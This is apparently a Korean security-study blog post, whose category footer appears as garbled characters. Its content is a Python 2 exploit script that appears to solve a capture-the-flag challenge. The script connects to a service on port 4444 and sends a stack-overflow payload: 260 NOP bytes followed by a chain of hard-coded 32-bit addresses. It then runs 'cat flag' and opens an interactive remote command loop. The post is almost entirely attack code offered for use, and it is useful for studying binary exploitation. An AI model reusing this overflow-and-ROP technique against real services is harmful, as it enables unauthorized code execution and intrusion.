728x90
๋ฐ์ํ
- from socket import *
- HOST = ""
- PORT = 4444
- s = socket(AF_INET,SOCK_STREAM)
- s.connect((HOST,PORT)) #connect
- payload = "\x90"*260
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x40\xa0\x04\x08"+"\x54\x81\x04\x08"
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x41\xa0\x04\x08"+"\x57\x81\x04\x08"
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x42\xa0\x04\x08"+"\x56\x81\x04\x08"
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x43\xa0\x04\x08"+"\xc2\x82\x04\x08"
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x44\xa0\x04\x08"+"\x54\x81\x04\x08"
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x45\xa0\x04\x08"+"\x99\x86\x04\x08"
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x46\xa0\x04\x08"+"\x88\x86\x04\x08"
- payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x47\xa0\x04\x08"+"\xd4\x9f\x04\x08"
- payload += "\xc0\x83\x04\x08"+"AAAA"+"\x40\xa0\x04\x08"
- print s.recv(1024) #1024 byte read
- s.send(payload + "\n")
- print s.recv(1024)
- s.send("cat flag" + "\n")
- print s.recv(1024)
- while True:
- cmd = raw_input("$")
- s.send(cmd + "\n")
- print s.recv(1024)
- print s.recv(1024)
- s.close()
728x90
๋ฐ์ํ
'Security Study > Source' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
mac ํฐ๋ฏธ๋ vim ๊พธ๋ฏธ๊ธฐ (0) | 2015.12.10 |
---|---|
sql injection reverse (0) | 2015.11.21 |
์์ผํ๋ก๊ทธ๋๋ฐ (0) | 2015.11.21 |
Blind Sql Injection (0) | 2015.11.21 |
Base 64 encoding (0) | 2015.11.21 |
๋๊ธ